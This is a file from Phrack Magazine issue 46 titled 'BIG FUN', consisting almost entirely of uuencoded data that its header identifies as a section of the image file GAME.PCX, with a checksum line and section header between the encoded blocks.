M^''!_'Y_P?'!_\'SP?%_P?YX<<'XP?!\<<'\PGC!\<'F?G___\7_P?W!_\']#
|
|||
|
MP?G!_\'YQ/#"<&#"<,E@<&!P8,1P8'#!\'#!\'##\,'XP?G"_?/_SO_!P''!"
|
|||
|
M_&Y_P?!_P>/!\0'!_GYP>,'P?S#!_'QXP>?!X@=____4_\+YP?'!\&#$0`!`6
|
|||
|
M`&#%0,H`PD``0&!PP>#"8,'PP_G!^\'_P?OE_\[_P<`SP?X.'\'@'\'/P?,#_
|
|||
|
MP?X^8!P"/Q#"/GC!S\'F!S___]C_P]_"GQ^?"%_#G\+?'@_"#L,&`LP`PP+"&
|
|||
|
M!@(.#\'?XO_._\'/P?_!_@8?IQ_!S\'W#\'_/B<<!S\?#CY_P<_!YP<____MB
|
|||
|
M_\*?'\H/P@[(!L(.Q@\?P@^?P=^_T__._\'/P??!_@<?!\'_P<?!YP_!_S]G?
|
|||
|
MO@\_'P\^?\'/P><'/___^?^?Q(_$#P?+!L('P@\'P@_"C\[_SO_!W\'SN`<>L
|
|||
|
M)\'_PN<_P?\^9\']P?_"/\'&/GS![\'F.#___]__P?WC_\*_GX_"#\(&Q`3'*
|
|||
|
M``3._\__P?!QP>&`8<'_P>'!XS_!_GC!X<'YP?\\,\'@?,'XP>?!YGA____?R
|
|||
|
M_\'Y[/_!_<'_P?W!\</@8,,@SO_/_\'P8<'QP>#!\'_!\&?!_\'^8,'PP?C!7
|
|||
|
M_\'@<,'@?,'XP>#!YGA____?_\'YP?_!\<'_P?S!\<'PQ/_!\\'_P?'G_\+Y]
|
|||
|
MP?'._\__P?AQP?O"\'_!^'_!_\'^8<'P><'_P>#!\&Q\P?C!\'9\?___W__!/
|
|||
|
M^,'_P>#!_GQAP>#!_\+SP?_!\<'\8,+\P?C!]_3_VO_!^,+_P?'!^'_"_\'X+
|
|||
|
M?___X?_!^<'_D'X_0\'`P?_"X<'G`,'^`,',?#@']/_B_\'^/___X_^>'A_"(
|
|||
|
MG\'_P</!X\'''L'_AXX^.`_T_______(_Q\>'X^?P?^#P>'!QSY_P<\./CN_N
|
|||
|
M]/______R/^?'@_"C\'_A\'C1SY_P<^.'AO!W_3______\;_P?G!_Y^<PH^`<
|
|||
|
MP?^-P>8'?G_!SXP<.`_T_______&_\'YP?^_N`?!_\'AP?^`P>`'?G_!Y\',L
|
|||
|
M`#`O]/______QO_!^<'_P?[!\`/#_X#!XH9^?\'GP<C!P'#U_______&_\'YE
|
|||
|
MP?_!\'#!X\'_P?G!_W!QP>)X?\'GP?C!X'#U_______&_\'YP?^`<<'CP?_!I
|
|||
|
MP<'_.&/!QA#!_\'/P<S!PC'U_______(_X-_P??!WX(_/B>'`\'_P<^.P<<8%
|
|||
|
M#_3______\C_C\/_C\)_/\'/!\'_P=^/P<\\#_3______]'_C\7_#_3_____:
|
|||
|
M_\;_P?W__\;______\;_P?G__\;______\;_P?G__\;______\;_P?G__\;_`
|
|||
|
M_____\;_P?G__\;_________S?_X_\'O_____]/_^/_![______3_______&G
|
|||
|
M_\']___&_______&_\'Y___&_______&_\'Y___&_______&_\'Y___&____U
|
|||
|
M___&_\'Y___&_________\W_________S?_________-_______&_\']___&Y
|
|||
|
M_______&_\'Y___&_______&_\'Y___&_______&_\'Y___&_______&_\'YQ
|
|||
|
M___&_________\W_________S?_________-_________\W______\;_P?G_I
|
|||
|
M_\;______\;_P?G__\;______\;_P?G__\;______\;_P?G__\;______\;_W
|
|||
|
MP?O__\;_________S?_________-_______&_\']___&_______&_\'Y___&>
|
|||
|
M_______&_\'Y___&_______&_\'Y___&_______&_\'Y___&_______&_\'[S
|
|||
|
M___&_________\W_________S?_________-_______&_\'Y___&_______&V
|
|||
|
M_\'Y___&_______&_\'Y___&_______&_\'Y___&_______&_\'[___&____S
|
|||
|
M_____\W_________S?_________-_______&_\'Y___&_______&_\'Y___&U
|
|||
|
M_______&_\'Y___&_______&_\'Y___&_______&_\'[___&_________\W_B
|
|||
|
M________S?_________-_______&_\'Y___&_______&_\'Y___&_______&'
|
|||
|
M_\'Y___&_______&_\'Y___&_______&_\'[___&_________\W_________;
|
|||
|
MS?______QO_!^?__QO______QO_!^?__QO______QO_!^?__QO______QO_!K
|
|||
|
M^?__QO______QO_!^?__QO______QO_!^___QO_________-_________\W_R
|
|||
|
M_____\;_P?G__\;______\;_P?G__\;______\;_P?'__\;______\;_P?G_W
|
|||
|
M_\;______\;_P?G__\;______\;_P?O__\;_________S?_________-____=
|
|||
|
M___&_\'[___&_______&_\'Y___&_\[_P?W___;_P?'__\;_SO_'<,+P<,7PV
|
|||
|
MP?G!_,+Y___D_\'Y___&_\[_0,X`0&#"<,'QP?G!_\'[___@_\'Y___&_\__Q
|
|||
|
MPM_#G\'?'@\?Q`[(`@`"!@(&`L(&PPX/PA\/'@\?P?^?O___S/_!^___QO_:\
|
|||
|
M_Y_!_Y^/#Q_$#\(.PP8$!@0&!`8$Q0;##L,/'P\?G\'_O______+_^3_G[^?_
|
|||
|
MPX_'#\0'P@8'Q0;"!P\'Q@_"C\*?_____\'_]/^?PX^.#L,$Q``$PP#$!`X$1
|
|||
|
M!P^_C\'/]/_!^___QO_^_\']PO'!X<'@PF`@`,,@PP`@P@!@(,)@P>#!X<'PA
|
|||
|
MP?'!^>O_P?G__\;____#_\'YP?''\,+@PV!`PF#"0,1@Q?#!^<'XP?G!_>+_0
|
|||
|
MP?G__\;____1_\'[P?_!^,3P<,'PQW#%8'!@PG!@<,3PP?C!^</XP?G/_\'QO
|
|||
|
M___&____WO_!^\+_P?C!^\/P<,)@PT#&`$``PT!@>,/[P?_!^\?_P?G__\;_!
|
|||
|
M___H_\/?GQ["!L,"`,("P@`"`,("PP8.#Q\.'\'?'Y/!WY_!_\.?P=_^____W
|
|||
|
M\?_"G\</#LH&`,<&P@[&#Q^?OY_R____^?_"G\,/Q@?%!@?*!L,'#P?'#X\/F
|
|||
|
MCY_G_______&_[_!_\._PO_#OY^/AP;#!,T`!L('P@\?P[_?_______3_\/],
|
|||
|
MP?'"\,+@PV#&(,4`Q"#"8,+@P?'#^=?______]__P?O#_\'YQ?#"X,1@0,=@0
|
|||
|
MP>!PQ/#!\<[______^;_P?W!^<'_Q/C%\,-PR&!PSO______\__"^\'YP?C#L
|
|||
|
M\'!@PD#._______]_\'?SO_________-_________\W_________S?______S
|
|||
|
M___-_________\W_________S?_________-_\__P=]_______O_SO_!_L(&&
|
|||
|
M#W______^?_._\'^P@8'?______Y_\[_P?S"_\'^?______Y_\[_P?S"_\'\A
|
|||
|
M______K_SO_!_,+_P?S_____^O_._\'\PO_!_/_____Z_\[_P?S"_\'^?___'
|
|||
|
M___Y_]'_P?Y_______G_T?_!_G______^?_2_W______^?_._\']PO_!_G_#@
|
|||
|
M_Q^`/Y_$_\'//\'_O______J_\[_P?W"_\'\PO_!^,'_/P`_O\'GP?_!^,'_.
|
|||
|
MP>`GP?`AP?_!_L'AP?_!\______E_\[_P?S"_\'\PO_!^,)\('Z_P>/!_\'XV
|
|||
|
MP?_!P$'!\`'!_\'X`,'^P<#!_\'OPOC!_\'QPO_!^<+_P>#!_\'PP?/!\/__`
|
|||
|
M___5_\[_P?S"_\'\PO_!_,)\>'Y_P?/!_\'P?\'@8<'P<<'_P?!PP?Q@?V_!&
|
|||
|
M^'A_P>'!_G_!\,'_P?Y@?\'P<,'P?______4_\[_P?W"_\'^PO_!_#Q\?\''I
|
|||
|
M'\'CP?_!\'_!Q\'PP?'"_\'@P?C">!\'P?AX?\'AP?P/P?#!_YX`!\'@`,'`F
|
|||
|
M`\'_P?G_____TO_1_\'^?\+_#'S!_\'''\'GP?_!\A^/P?C!\\+_P>/!_CC!5
|
|||
|
M_P\'P?@\'X'!_@_!\#_"'X?!PY_!PY#!_\'YR/_!_G_*_\'/___\_]'_P?Y_V
|
|||
|
MPO\,P?S!_\'''\'GP?_!XQ^/P?W!Q\+_P>?!_SS!_P\'P?@\'X/!_@_!\,,?Y
|
|||
|
MPL?!_\''P?Q_P?W(_\'^?\K_P<_(_\'?___S_]+_?\+_A\+_P></P>?!_\'G=
|
|||
|
M#X>#P<>?P?_!Q\'_P??!_X<'P>`^#X/!_@?!\,(/'\'GP<?!_\''P?X_P>%_C
|
|||
|
M#\'_P>^_P?_!S\'_P?Y_RO_!Q\C_P<^?P?\____P_\[_P?W"_\'^?\+_@\']M
|
|||
|
MP?_!YQ_!Y\'_P></AX'!XQ_!_\''P?_!\<'_P<<#P>!\'X'!_(?!\`_"'\'Q)
|
|||
|
MP>?!_\''P?P_P>!^!\'_P>0_O\''P?^>?\K_P<?(_\'/G\'_/___\/_._\'];
|
|||
|
MPO_!_,/_P>'!^,'_P>,?P>/!_\'CC\'``\'P`<'_P>?!_\'QP?_!XP'!X'@/C
|
|||
|
M@<'XP>'!\,''GS_!\<'AP?/!X\'\?\'PP?@AP?_!X#\!@'P`POG!\#_!X,'_G
|
|||
|
MP?PCP?#!_\'PP<?!_\'YQ_^_RO_"\=G_P?G__\S_SO_!^<+_P?S#_\'CP?C!A
|
|||
|
M_\'R'\'CP?_!X8_!P`/!\&'!_\'GP?_!\<'_P>,0P>!XP<8!P?#!X<'PP>/!R
|
|||
|
MWG_!\,'@8\'CP?Q_PO#!X<'_P>#!W@$@?$#"\<'P?\'`P?_!^`'!X&?!\$/!P
|
|||
|
M_\'@P?_!X<'XP?G!]\W_P?'!^]'_P?Y_QO_!\<;_P?S"_\'[___"_\[_P?C"$
|
|||
|
M_\'\P__!X\'XP?_!\W_!\\'_P>`/P>#!\<'PPO_!Y\'_P?'!_\'C,,'@>,'@$
|
|||
|
M<<3P/G_!\,'@8<'CP?Q_P?C!\<'XP?_!X\'N/'XX<,+QP?#!YG!_P?AQP>!AM
|
|||
|
MP>`#P?_!X'Y@P?!P8'/!_C_!_\'\P?'!^'?!\,'_P?#!_\'SP?'!_\'XT/_!M
|
|||
|
M_L?_P?'&_\'X?\'_P?'!\___P?_._\'YPO_!_L/_P>/!^,'_P>,?P>/!_\'`&
|
|||
|
M#\''PO/"_\'GP?_!\<'_P<,0P<!XP<(QP?#!X<'PP?$>/\'QP>`#P</!_'_!*
|
|||
|
M^<'QP?G!_\'GP<X>?QC!^,+QP>/!SCQ_P?C!\<'@0<'`!\'_`!X`<,(``\'.4
|
|||
|
M#\'_>`'!^`?!P'_!P,'_0\'@P?O!\'_!^<;_P=_/_\'CP?_"S\/_P?A_P?_!V
|
|||
|
M\\'GQ/_!Q\7_P??U_]'_P?Y_PO_!Q\'^/\'''\''P?^&!X_!^\'SPO_!Q\'^A
|
|||
|
M,\'_AQP.>$(1P<`!PO#"'\'YP<?!_\''P?X_P?G!Y\'\P?_!S\'''C\-P?Y[Y
|
|||
|
MP?F'P?["'\'_P>'"XX_!Q\'_#XX>,'!!P<./#\'_'@#!\`>"#P8^`\'`P?/!1
|
|||
|
MP`\`/\'^`\'"#X(?P?\'P?X/P?X?P__!W\'_P=_#_\''P?_!SX_#_\'XPO_!&
|
|||
|
M\\''Q/_!W\7_P>?U_]'_P?Y_PO_!Q\'^'X\/P<?!_\(/C\'_P>?"_\''P?XYP
|
|||
|
MP?^/'`XX0`'!P`'!\\'\#Q_!^\''P?_!Q\'^/\'YP>?!_<'_PL\>/PW!_G_!(
|
|||
|
M^8_!_@\?P?^!P<?!YX_!S\'_#XX^*<'AP>/!YX\/P?\>#&/"A\(/'@_!P\'G!
|
|||
|
MAP\&/\'^`\'`#X`/P?\'P?X/P<X/G\'??P_!_P_"_Q^'P?^/#\/_P?E_P?_!3
|
|||
|
MX\'/RO_!Q\S_'\C_P>_!_\'/W?_/_\,/?\+_P<?!_P</AP_!_Q_!QX_!_\'G&
|
|||
|
MPO_!Y\'^/C\/'@X_P>`CP<<.P?/!_@\?PL?!_\''P?X_P?_!Y\+_P<_!QQX_R
|
|||
|
MC\'^>\'_C\'_!A_!_@/!Q\'CC\''P?\/A@X[P>/"YX\/P?\>?F.?CX</#C_"O
|
|||
|
MY\*'#Q_!_P?"AX\/P?X'P?<'P<<'PH\>!\'^!L'_P>X/A\'_!X8?A\'_P>`_<
|
|||
|
M!\'CPL<_PO_!SX_!_X_"_X?,_P_(_\''P?_!S]W_SO_!_``$`,/_P<?!_@`//
|
|||
|
M@`_!_A_!XX_!^<'CPO_!X'P\/P\\'GC!X''!Q\'\P?'!_,(?PL?!_\''P?Q_+
|
|||
|
MP?G!Y\']P?_!S\''/C^-P?YQP?F/P?X`/\'\`<''P>.?P<?!_Q_!Q``YP?'".
|
|||
|
MXX\?P?\\P?QP/X_!QQ\<P?_!X\'QC\''PA_!_\'PPH?"'\'\/,'AP</!P0>/Y
|
|||
|
MCCP`P?P`P?_!X`>!P?\'@!\!P?_!X#P'P>'!Q\'`/\'\P?^/@'\'P?_!_`?"9
|
|||
|
M_\''P_^/O\3_#\C_P<?!_\'/P__!Y]G_SO_!_<'PP>#!X</_P>/!_\'@P?_!B
|
|||
|
MX#_!_W_!\<'OP?#!X"'!_\'X`,'\`#_"/'C!\,'QP>/!_,'PP?P?``/!X,'_S
|
|||
|
MP>'!\,'_P?G"\<'_P>?!QSQ_*<'XPO'!Y\'\?\'_P?#!\<'CP>&?P>/!_[_!!
|
|||
|
MP"#!^</QP<\_P?\XPO@'P<?!X@`(P?_"\<'?P>/"/\'_P>#"YS^?P?C!_,'AL
|
|||
|
MP?#!X\'AP>>./,)XP?#!_\/AP?_!PX$/.,'_P?!P8<'QP>/!P"S!^'G!QX!\P
|
|||
|
M`,'_P?`!P>`_@'S!_,'P``/!^"_!X'P'P>#"_\'GQ/_!X\7_P>/$_\'YP?_!#
|
|||
|
M^<'QT?_/_\'YPO'%_\'PP?_!\,/_P?/!_\+P8<'_P?@`P?P`?WY\>,'PP?'!P
|
|||
|
MY\'\P?#!_#X``\'@<<+@P?_"\,'QP?_!X\'&/'XXP?C"\<'GP>1_P?_!\,'Q8
|
|||
|
MP>/!X<'?P</"_\'`<</QP?/!S\'_P?YXPO@#P<?!X`!XP?_"\<'?P>/"/\'\=
|
|||
|
MP>#!Y\'B?\'_P?C!_\'CP?#!Y\'QP>?!_GS!^,'PP?C!_\'CP>'!Y\'_PL?!7
|
|||
|
MW'Q_P_#!\<'CP</!Q'AQP<>`>'#!_\'@0<'`'X!XP?S!\``!P?`'P<!\!\'@L
|
|||
|
MP?_!_$'!^,'_P?C!]\'@PO_!\<+_P>'$_\'PP?_"\='_X/_"^<'_P?[!\<'_)
|
|||
|
MP?#"_\'^P_G!_\'\P?'"_\'P?\'P8,'@8<'_P?AX8<'_P>!^?W!\<,+PP>#!!
|
|||
|
MYGQ_PO#!X\'QP??!X\+_P>Q\P?G#\<'_?\'_>,'XP?_!\<'GP?)XP?C!_\+QW
|
|||
|
MP?_!XWX_P?A@P>?!X'_!_\'XP?_!X\'XP>?!\<'B?GC!^'#!_,'_P>?!\<'G5
|
|||
|
MP?_![\'_P?QX?\'XP?'!^,'PP>/!_\'B<''!Y\'^>,'XP?_"X<'PP>;">,'\Y
|
|||
|
MPO#!\<'PP>'!X#PG8'_!_&#!\'_!^&'!X'_!_\'@P?AAP>#!^'_!_\+PP?_!?
|
|||
|
M\,'XP?_!_,__YO_!^\3_P?O#_\'[PO_!\'_!X`'!X$/!_\'X>`?!_\'`PC\`(
|
|||
|
M?$!X0<'@#SA_P?#!X,'CP>'!PX/!_P\,?'G!\<'AP?/!SS_!_SC!^'_!\<''?
|
|||
|
MP>,_P?C!_\+QP=_!X\(_P?@@P<?!XG^?P?C!_\'CP?C!Y\'QP>(^>,'\<<'\V
|
|||
|
MP?_!Q\'QP>?!_\'/C\',`'_!^,'SP?C!\<'#/\'"<''!QSXXP?C!_\'#P>,?)
|
|||
|
MP<9_>,'\PO#!\<+A@8\/"#_!^'#!\'_!^$/!X`/!SX!X`<'`P?`?P?_!P,'@-
|
|||
|
M?\'@>`/!^'_.__O_'\'_P<=_P?_!Q\'_!GX'P?H?@G_!_`!'P>/!P`_!_P`?(
|
|||
|
M`'O!^\'CP?./'\'_'GQCP?.'CQ\<?\+SC\''PA_!^,'PPL<?G\'\P?_!Q\'XR
|
|||
|
MP<?!X\'B'AQ\.\'^P?^/P?/!Q\'_P<^/C@`_P?C!Y\'\P?/!QQ_!QQ`'AQ\\5
|
|||
|
MP?S!_\'/P<<?AC_"_'/!^,'[PL/"CQ\/O\'\?GC!_\'SP=/"PX\>'%'!P\'CE
|
|||
|
M#\'_!C!_P>!X`\'P#\[__?^/PO_!S\'_#\'_#\'_'X=_P?X/P<_![\'`#\'_E
|
|||
|
M`!\!?\'_PN>/#\'_'GQC!X?"#QX_P>?!XX^'PA_!_,'PA\''PA_!_']'P?_!!
|
|||
|
MS\'GP>`^''P_P?[!_X_!Y\'/P?^/#XX/?\'YP>?!_,'CP<<?AP8'CQ\]P?S!6
|
|||
|
M_X_!QQ^&/\'\?#/!_\'[@P/"C\(/P?_!_<'^/\'_P>?!_\+'CQX=?\+'C\'_G
|
|||
|
M#CW!_\'YP?@#P<8/SO_]_\'/TO\//X_#_\'WPH_!_S_!_WX'A@^&'P?![\'WM
|
|||
|
MP<</PA_!_@('P<?"#\'^'B?"QX?!ZG\>?C_!_L'_A\'GP<_!_\./'\+_P>?!2
|
|||
|
M_\'CP<</A\('A\(?P?[!_\'/P<<?P<8_POXWP?_!\X('PH\/AS_!_\'^+\'_V
|
|||
|
MP>?!_\''P?>/P@_!_\+'O\'_GC_#_\'GP<>'SO_]_X_2_X_'_X_!_S_!_\'\Q
|
|||
|
M!X`?@#\#P?C!]\'@'S\?P?P`!\''AA_!_!S!\8/!QX?!^'X\P?P\P?S!_X?!=
|
|||
|
MY\'/P?_!SX^./\'_P?G!Y\'\P>'!QQ^/P@>'/SS!_,'_P<_!YQ_!QG_"_,'SF
|
|||
|
MP?W!\8`'PH\/P<`_P?G!_C?!_\'GP?S!Q\'SC@01P?_!Y\'P/\'_P?P]P?_"8
|
|||
|
M^<'QPL?.____T?^_S?_!Q<'_P?W!_\'[P?W!_\'XP__!_##![\'GP>`_P?\`#
|
|||
|
MP?`#P>`'P?C!_GC!_'A@P?_!X,'CP>?!_\'GC\',.'_!^<+PP?'!X\*/@P?!O
|
|||
|
MQS\XP?C!_\'#P>&?P>9_P?C!_,'QP?C!\<'CP?^/AS_!^#_!\<'\<<'_P>'!T
|
|||
|
M^,'CP?'!Q`!QP?_!X\'P+\'_P>!YP?_!^<'QP?#!X,'CSO___]__P<?&_\']I
|
|||
|
MQO_!]\'PPO_!X<'X<\'@?\'XP?[!^,'\P?A@P?_!\$?!Y\'_P>/!_\'>,,'_)
|
|||
|
MP?'!\,'AP?'!X\'`/\'#A\''P?YXP?#!_\+CG\'&?GC!^,'QP?#!\<'CP?'!=
|
|||
|
MW\''PO]_P?'!^''!_\'QP?#!X\'QP<1PP?'!_\'CP?A'P?\`><'_PO'!\,'`S
|
|||
|
M`\[____T_\'@P?_!^,'_P?W!_L'\<,'_P?A_PO_!\\+_P>#!_\'YP?AAP?'!0
|
|||
|
M\\'P?\'WP?_!Y\'^?'#!_\'P8\'@/G!X<,+PP_'!_\'GP?]_P?_"^'G!_\'Q5
|
|||
|
MP?#!\\'QP>1_P?#!^<'SP?_!X\'\<'G!_\'YP?'!^,'@P?/.____W__!S]3_\
|
|||
|
MP>?!_\'YQ/_!\,'_P?S#_\'SPO_!X<+_P?X#P?O!_\'P?\'_P=_!S\'_?`#!O
|
|||
|
M_\'@`\'`'X!\`,/QP>#!PY^'P@\?POAYP?_!\<'PP>/!\\'.?W#!^<'CP?_!'
|
|||
|
MX\'^?'G!_\'YP?'!^<'#S_____3_P<?!_\''P__"_M;_B,'_P?X?P<8?@\'^F
|
|||
|
M`L/_P?H/GX\/`A_!_@/!^\'_P?@#P<('CQXX$\'GPL?!_AX[P?_"^\'_P<_/R
|
|||
|
M____]/_!S\'_A\/_P?P/UO^<Q/]_PO\/P__!_@^?CP^$/\'^!\+_P?X'P<`/:
|
|||
|
MCPX^!\'GP<</P?\,'\3_PL_.____]/_![\'_P<_#_\'^!];_#]/_C\/_#\'O;
|
|||
|
M#X^'P?\'P>?!Y@_!_P8??\'_?\'_P<<'SO____O_#]7_P?P#U_^_P?^_C\'G>
|
|||
|
MP?^/P?_!_!_!_P<<?\'\?\'_P?`/SO______TO_!_`':_\'/RO_!_<+_P?@O#
|
|||
|
MSO______[O_!S]W______^W_P?Y_W?_________-_________\W_T/\_Q__!3
|
|||
|
MS______S_]#_/\?_P<______\__/_\'^/\?_P<_!_\']R/_!_G_!_\']SO^?O
|
|||
|
M_____];_S__!_'_'_\'OP?_!^<C_P?S!_\'YP?C,_\'^?[W_____UO_._\'@G
|
|||
|
MP?QX9\'PP?_!X\+_P?#!Y\'QP?#$_\']P__!^,'_P?C!_<S_P?Y^?,/_P?'![
|
|||
|
M_\'GPO_!^<7_P?[!]______&_\[_P>!\>&/!\'[!X<+_P?!OPO#!_L/_P?C#A
|
|||
|
M_\'XP?_!\,W_P?["?,/_P?'!_\'WPO_!^<7_P?[!]\7_P?[_____SO\#'#AAW
|
|||
|
MP<`<`,+_P>`'`'!X`\+_P<!\`<'\`'_!\'C!\`!?P?#"_\'#P?A_P?C!_\'X`
|
|||
|
MP?_!_'_#_\'SP?_!Y\+_P?G%_\'XP>/![\'_P?S"_\'\?____O_._P\>.$.&R
|
|||
|
M'AK"_\'"#P80?`/"_X(>`<'^`'_!\#[!\@(/P<)_P?\#P?(/P?X?P<9_P?X?/
|
|||
|
MP?^?P?^7P?^/PO_!^\7_P?[!Y\'?P?_!_L+_P?Y____^_\[_#XX_AP^>/G_!1
|
|||
|
M_\*/'AQ]P?O"_X\.#'P,?\'\/&`"!XX?P?X,P>`#P<(/AAX\#C\'P?P'P?^&U
|
|||
|
M'X?!_\'^#\*_P?_!_<'GP?_!S\'\?\'_GC_+_\'/RO_!Y___Y__._P^//X</0
|
|||
|
MGAY_P?_"CYX?POO"_X\.'G]^?\'_P?[!XX.'CQ_!_@_!X@/!QP>''CX./@?!.
|
|||
|
M]@?!_X8/A\'_P?X/GQ]_P?_!YX^'P?X_P?^.?X_!_Y_(_X_*_\'GQO\____@%
|
|||
|
M_\[_#XX\`1_!_`!_P?\/P<^`&,'@`<+_P?X,?''!_'_"_,'SP>/!YQ^?P?X_O
|
|||
|
MP?'!\,+''Y["/L(\8\''P?_"APP\P?`'CAY_P?'!YX\`,#_!_@!^`<'\!\'/1
|
|||
|
MP>^`!'^/P?^_C\C_P?S%_\'SPO\____@_\[_O\',>`&_P?@`PO^/P>_!X#C!_
|
|||
|
MX`#"_\'@/,'X<<'XP?_!\,'XP?'!X<'B'Y_!_#_!\<'PP</!XC_!_L)\>,'X[
|
|||
|
MPN'!_\'!P>8X>,+AP<X\?\'QP>&/`'!_P?@`?`#!\`/!Y\'C@"!_`<'P/X/!C
|
|||
|
M\,+_P>'$_\'XQ?_!\<+_/___X/_/_\'$<,'QO\'XP?'"_\'?P>8`>,'PP?'"@
|
|||
|
M_\'`.,'X<<'XP?_"\,+SP>(`'\'^`,'QP?#!P$)_P?["?'#!\&/!\<'_P<?!K
|
|||
|
MX'APP>/!\<',','_P?'!X<'./'#!_\'XP?!XPG#!\,'#P>/!P`!\8,'P1\'!V
|
|||
|
MP>!_P?Q`P?A_P?[!P,'P8<'SP?!_P>'!\,'X___B_\__P>QPP?'!_\'XP?O#N
|
|||
|
M_\'N<'C!\,'QPO_!X#C!^''!^,'_PO#"\\'B('_!_F#!\<'PP<!@?\'\PGS"U
|
|||
|
M<&/!\<'_P>?!X,)PP>/!\<'L.,'_P?'!X<'L/,'XP?_"^,)X<,'PPN/!\#!X<
|
|||
|
M<,'PPF/!X'_!_'#!\'_!_&#!\&'!\\'@?F#"\'___^'_SO^#'#'!X8>8?,+_!
|
|||
|
MP<_!QCPXP?'!^<+_'QQX<<'X?\+XPO/!XQG"_\'PP?'!^,'`?G_!_GY\<`#!5
|
|||
|
MP\'SP?_!S\'@`##!P\'QP<08P?_!X<'CP<\!P?C!_\'YP?QPP?YSP?O!Q\'CO
|
|||
|
MPI\8P?ACP>/"S\'_P?C">'_!_,)X<<'CP<`>$,'@P?!#P<Y____?_\[_!AXPN
|
|||
|
M`8\>/L+_CPX>&,'SP_\?''YQP?Q_POC"\\'G'\+_P?QSP?B/GA_!WCY^.`_!^
|
|||
|
MQ\'WP?^/P<8`.,'/P?/!S@S!_\'CP>>/`L'XP?_!^<'^><'^`\'_P<_!Q\(?;
|
|||
|
M&,'\9\''CP_!_\'\?GA_P?Q^/'W!QX>>'G/!\X>/?___W__._P8_/`&$'@?!$
|
|||
|
MY\'_P<8/`!P\!\'/P?\.#'X\"'_"_,/G#Q_!_CXCP?'"SQ\.PCX\P?_!Q\'W(
|
|||
|
MP?^/P<8?P?S!S\'CP<0-P?_"YX_!Q#S!_\'YP?XYP?X#P?^/P<?"'QP`9\''F
|
|||
|
MCX?!_\']P?X]P?_!_,'_/<'\9X^./WO!\\'_C___X/_._P<_/@?!QA\'P>?!M
|
|||
|
M_\'&#P8>/@?!S\'_!@Y^/@)_PO[#YP\?P?X>`X/"QP\.PS[!_P?!Q\'_CX8?Q
|
|||
|
MP?_!Q\'CP<6#P?_!Y\''C\'./\+_P?X[P?X'P?^/P<?"'QX&9\''CX<_PO\_H
|
|||
|
MP?_!_L'_/\'^1P\.?\'WP>.?C___X/_._P_"_[_"_X_!\\+_OX^_?@_!Q\'_=
|
|||
|
M@`S!_GX`?\'\/,+WP>>`'\'^`,'P`\'@!X0>/GP\','CA\'_AX8>.,''P</!#
|
|||
|
MX<'!P?_!X\'GCS\\P?_!^<'^.<'^(\'_PL?"'Q@/P>?!QX_!_!_!^<'^.<'_,
|
|||
|
MP?S!_SS!_&>`#'_!\\'T#X___^#_SO^_QO_!\\'_P?W%_\'GP?_!X<'MPOP@X
|
|||
|
MP?_!^'C"\\'WP>!_P?X`P?`!P>`'P<##?'@@P?!#P?^!AC!PP>'!X\+AP?_!\
|
|||
|
MX<'CCGPXP?_"^'G!_''!\<''P>._/SC!_\+CP<_!^#_!^<'^><'_P?C!_SC!`
|
|||
|
M_,'C@#C!_\'QP?@CP<___^#_U?_!\\?_P>?,_\'XPO_!\\'PP?_!\,'_P?#"F
|
|||
|
M_L+\0<'P8\'_P>!_P>#"\$/!\<'AP?_!\<'CP<XP>,'_P?AP>'#"\,'AP</!K
|
|||
|
M_[^XP?C!\\'CP<_!_X_!^,'\>,'_P?C!_'C!_,'AP=O!^,'^P?'!_\'CP<__G
|
|||
|
M_^#_U?_!\]3_P?G#_\'QP?_!_,'_P?C"_\'^P?_!\<'X<\'_P?!_P>#!^,'P$
|
|||
|
M?\'QP>'!_\'QP>/!_F!X?\'X<'APP?!AP>#!P\)^>,'XP?/!X\'OP?]_POAX1
|
|||
|
MP?_!^,'\>,'XP>/!_\'XP?S!\<'_P?/![___X/_N_\'QU?_!\<+_P<#!_'_!(
|
|||
|
M_@!^`<'X`\'@`\'?/SP!P?/!X\'#P<`_P?QP>,'_P?S"<'C!X\''G'AQPO/!U
|
|||
|
MS___X/_N_\'SU?_!^<+_P<_!_W_!_P_!_P?!_P_!\`^?'QX#P>?!Q\'#@!_!2
|
|||
|
M_@#!^<'_P?X`>!/!QX<>',+SP<./___@____Q?_!_G_/_X_"_\+/?\'_#\/_N
|
|||
|
M!\'^!\'GP<0?!\'\?`^//___W____\;_?\__P=_&_X_#_X_!_P_"YQ^'PO["_
|
|||
|
M#S___]_____D_\'GQ?^_'___X/___^3_P>/&_S___^#____D_\'C___G____5
|
|||
|
MY/_!]\;_?___X/_________-_________\W_________S?_________-____U
|
|||
|
|
|||
|
sum -r/size 20457/59873 section (from "begin" to last encoded line)
|
|||
|
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 7 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
BIG FUN
|
|||
|
(cont)
|
|||
|
|
|||
|
|
|||
|
section 2 of uuencode 4.13 of file GAME.PCX by R.E.M.
|
|||
|
|
|||
|
M_____\W_________S?_________-_________\W_________S?_________-R
|
|||
|
M_________\W_________S?_________-_________\W_________S?______D
|
|||
|
M___-_________\W_________S?_________-_________\W_________S?__R
|
|||
|
M_______-_________\W_________S?_________-_________\W_________>
|
|||
|
MS?_________-_________\W_________S?_________-_________\W_____R
|
|||
|
M____S?_________-_________\W_________S?_________-_________\W_R
|
|||
|
M________S?_________-_________\W_________S?_________-________]
|
|||
|
M_\W_________S?_________-_________\W_________S?_________-____R
|
|||
|
M_____\W_________S?_________-_________\W_________S?_________-R
|
|||
|
M_________\W_________S?_________-_________\W_________S?______D
|
|||
|
M___-_________\W_________S?_________-_________\W_________S?__R
|
|||
|
M_______-_________\W_________S?_________-_________\W_________>
|
|||
|
MS?_________-_________\W_________S?_________-_________\W_____R
|
|||
|
M____S?_________-_________\W_________S?_________-_________\W_R
|
|||
|
M________S?_________-_________\W_________S?_________-________]
|
|||
|
M_\W_________S?_________-_________\W_________S?_________-____R
|
|||
|
M_____\W_________S?_________-_________\W_________S?_________-R
|
|||
|
M_________\W_________S?_________-_________\W_________S?______D
|
|||
|
M___-_________\W_________S?_________-_________\W_________S?__R
|
|||
|
M_______-_________\W_________S?_________-_________\W_________>
|
|||
|
MS?_________-_\W_P?S!\<'SP?_!^______Z_\W_P?QPP?#!^,'PP?G!^,'[5
|
|||
|
M___)_\']___M_\W_P?S"0,L`0&!QPOO_____[/_._Q^.P@;"`L0``L(``@`"/
|
|||
|
M!@<>#AX.'A^?O\'?P?_!W______A_]3_O\'_G\'_P=_%#PX&PP[#!@0&#L,&\
|
|||
|
